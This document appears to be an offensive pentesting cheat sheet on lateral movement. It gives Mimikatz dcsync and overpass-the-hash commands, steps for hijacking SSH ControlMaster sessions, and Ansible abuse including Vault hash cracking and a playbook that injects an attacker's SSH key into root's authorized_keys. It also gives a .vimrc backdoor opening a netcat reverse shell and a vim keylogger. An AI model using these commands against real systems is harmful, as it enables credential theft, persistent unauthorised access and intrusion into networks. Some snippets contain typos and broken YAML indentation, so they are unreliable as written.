Lateral Movement

Jump to other users inside the machine, don't jump into a hole for a long time.

Check Active Network Connection

Check possibility of hidden network or ports.

# Windows
netstat -antp

# linux
netstat -tulpn

Type of Lateral Movement:

• Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash and bypass MFA for access to Windows

• Lands on system via phishing

Mimikatz to bypass MFA --> use dcsync

lsadump::dcsync /user:<current user>
# get the HASH from [Primary:Kerberos-Newer-Keys *] --> [Credentials] --> [aes256_hmac]

# overpass the hash
sekurlsa::pth /user:<current user> /domain:<domain> /aes256:<HASH>

# cmd appears as another user in the another machine

# access other computer
Enter-PSSession -ComputerName <other computer>

# ref: https://www.youtube.com/watch?v=Fmbp34dBuMc

Linux Lateral Movement with ControlMaster

ControlMaster is a feature that enables sharing of multiple SSH sessions over a single network connection. We have to wait for user to connect to controlmaster then hijact the session.

Check the current compromised linux machine:

cat ~/.ssh/config

# it seeems like this
Host * 
    ControlPath ~/.ssh/controlmaster/%r@%h:%p
    ControlMaster auto
    ControlPersist no/yes

Watch the session user logon in the folder ~/.ssh/controlmaster/

watch -d -n1 'ls -la ~/.ssh/controlmaster/'

there is new file come up like this:

# srw------ 1 <user> <user>   0 jan 1 <time> user@host:port

hijack it using this command in the current machine.

ssh user@host:port

# using -S for socket target.
ssh -S ~/.ssh/controlmaster/user\@host\:port user@host:port

Ansible

commonly user to run ansible is high privilege.

controller server must have /etc/ansible/hosts

or

check with ansible command in the server.

cat /etc/passwd |grep ansible

Command

ansible <target machine> -a "whoami"
#ansibleadm

ansible <target machine> -a "whoami" --become
#root

#backdooring the root

playbook

/opt/playbooks

code execution on the target computer with playbooks

#rce.yml

- name: get rce
    hosts: all
    gather_facts: true
    tasks:
        - name: display remote code exec
          debug:
              msg: "hostname: {{ ansible_hostname }} and os: {{ ansible_distribution }}
              

run with this command

ansible-playbook rce.yml

yaml file sometimes contains password plain text and encrypted password

if encrypted:

$ANSIBLE_VAULT;1.1;AES256....

ansible2john.py ./test.yml > crackhash.txt

hashcat carackhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt

upload the ansible hash vault to the compromized machine that install ansible-vault, save it to password.hash

cat password.hash | ansible-vault decrypt
# enter last cracked password with hashcat

Able to write the playbook.yaml?

add this to make a backdoor in the playbook.yaml

<snip>

become: yes
tasks:
    <snip>
    - name: make dir
      file:
          path: /root/.ssh
          state: directory
          mode: '0700'
          owner: root
          group: root
    - name: build authorized key
      file:
         path: /root/.ssh/authorized_keys
         state: touch
         mode: '0600'
         owner: root
         group: root
    - name: inject ssh key
        lineinfile:
            path: /root/.ssh/authorized_keys
            line: "<ssh public key attacker>"
            insertbefore: EOF

RCE

- name: RCE
    shell: ping 10.10.x.y
    async: 10
    poll: 0

VIM Backdoor

Option 1

create ~/.vimrc

!<command>

:silent !nc 192.168.x.x 443 -e /bin/bash

Option 2

create ~/.vimrc

:silent !source /tmp/.vimrunscript

.vimrunscript contains the bash script.

#!/bin/bash

<command>

sometimes when user run sudo vi, it's using vimrc from root directory. but we can create an backdoor of it.

echo 'alias sudo="sudo -E"' >> .bashrc

VIM Keylogger

create ~/.vimrc file:

:autocmd BufWritePost * :silent :w! >>/tmp/keyLogFromVim.txt

or this payload more advanced:

~/vimrc

:if $USER == "root"
:autocmd BufWritePost * :silent :w! >>/tmp/keyLogFromVim.txt
:endif

reference:

https://highon.coffee/blog/ssh-lateral-movement-cheat-sheet/